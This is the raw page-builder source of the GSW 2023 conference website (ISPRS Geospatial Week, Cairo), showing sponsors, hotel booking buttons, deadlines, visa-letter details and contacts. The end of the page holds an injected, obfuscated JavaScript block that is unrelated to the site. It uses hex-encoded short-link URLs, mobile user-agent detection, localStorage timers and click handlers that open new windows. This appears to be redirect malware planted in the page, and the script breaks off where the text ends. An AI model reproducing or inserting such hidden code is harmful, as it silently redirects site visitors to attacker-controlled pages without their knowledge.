width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\" overlay_pattern=\"01.png\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 